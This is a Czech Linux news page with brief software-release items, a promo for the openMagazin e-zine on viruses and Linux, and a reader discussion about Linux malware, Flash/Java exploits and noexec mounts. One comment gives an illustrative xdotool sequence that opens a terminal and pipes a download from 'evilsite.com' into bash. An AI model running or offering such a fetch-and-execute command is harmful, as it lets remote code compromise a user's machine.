Internetový prohlížeč Ladybird ohlásil tranzici z programovacího jazyka C++ do Rustu. Přechod bude probíhat postupně a nové komponenty budou dočasně koexistovat se stávajícím C++ kódem. Pro urychlení práce bude použita umělá inteligence, při portování první komponenty prohlížeče, JavaScriptového enginu LibJS, bylo během dvou týdnů pomocí nástrojů Claude Code a Codex vygenerováno kolem 25 000 řádků kódu. Nejedná se o čistě autonomní vývoj pomocí agentů.
Byl vydán Mozilla Firefox 148.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Nově lze snadno povolit nebo zakázat jednotlivé AI funkce. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 148 bude brzy k dispozici také na Flathubu a Snapcraftu.
Byla vydána nová verze 22.1.0, tj. první stabilní verze z nové řady 22.1.x, překladačové infrastruktury LLVM (Wikipedie). Přehled novinek v poznámkách k vydání: LLVM, Clang, LLD, Extra Clang Tools a Libc++.
X86CSS je experimentální webový emulátor instrukční sady x86 napsaný výhradně v CSS, tedy bez JavaScriptu nebo dalších dynamických prvků. Stránka 'spouští' assemblerovový program mikroprocesoru 8086 a názorně tak demonstruje, že i prosté CSS může fungovat jako Turingovsky kompletní jazyk. Zdrojový kód projektu je na GitHubu.
Po šesti letech byla vydána nová verze 1.3 webového rozhraní ke gitovým repozitářům CGit.
Byla vydána nová verze 6.1 linuxové distribuce Lakka (Wikipedie), jež umožňuje transformovat podporované počítače v herní konzole. Nejnovější Lakka přichází s RetroArchem 1.22.2.
Matematický software GNU Octave byl vydán ve verzi 11.1.0. Podrobnosti v poznámkách k vydání. Vedle menších změn rozhraní jsou jako obvykle zahrnuta také výkonnostní vylepšení a zlepšení kompatibility s Matlabem.
Weston, referenční implementace kompozitoru pro Wayland, byl vydán ve verzi 15.0.0. Přehled novinek v příspěvku na blogu společnosti Collabora. Vypíchnout lze Lua shell umožňující psát správu oken v jazyce Lua.
Organizace Apache Software Foundation (ASF) vydala verzi 29 integrovaného vývojového prostředí a vývojové platformy napsané v Javě NetBeans (Wikipedie). Přehled novinek na GitHubu. Instalovat lze také ze Snapcraftu a Flathubu.
Ústavní soud na svých webových stránkách i v databázi NALUS (NÁLezy a USnesení Ústavního soudu) představil novou verzi chatbota využívajícího umělou inteligenci. Jeho posláním je usnadnit veřejnosti orientaci v rozsáhlé judikatuře Ústavního soudu a pomoci jí s vyhledáváním informací i na webových stránkách soudu, a to i v jiných jazycích. Jde o první nasazení umělé inteligence v rámci webových stránek a databází judikatury českých soudů.
Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje. Pak si můžete udělat přehled a např. si nainstalovat některou z distribucí Linuxu.
Hned v prvním článku tématického okruhu se dozvíte, co je to linuxová distribuce a které jsou oblíbené. V dalších článcích jsou rozebírána jednotlivá desktopová prostředí, jejich výhody a nevýhody.
OpenMagazin (můžete si ho stáhnout) vám ukáže, že Evropa se přiklání k open-source softwaru. I v České republice se najde mnoho škol, které ho používají. Začtěte se do článku o jedné z nich. Recenze na hru Minecraft vás naláká k využití chvil odpočinku právě s ní.
Děkujeme všem, kteří kopírují, sdílejí a rozesílají e-zin všem svým známým a přátelům. Lidé z Liberixu ho vytvářejí pro vás, čtenáře, a také díky vašim darům může vycházet.
Tiskni
Sdílej:
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
mrkva@destiny:~$ cd /tmp mrkva@destiny:/tmp$ su Heslo: root@destiny:/tmp# mkdir noexec root@destiny:/tmp# chmod 777 noexec/ root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec root@destiny:/tmp# exit mrkva@destiny:/tmp$ cd noexec mrkva@destiny:/tmp/noexec$ cp /usr/bin/id . mrkva@destiny:/tmp/noexec$ ./id bash: ./id: Permission denied mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id ./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
.bashrc. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.Zajimalo by mne, co na to SELinux.
xdotool key Alt-F2 xdotool type xterm [RETURN] xdotool type "wget http://evilsite.com/|bash - ; logout"
I invoke.Tak takhle jsem se dlouho nenasmál
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
Flash? Java?Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.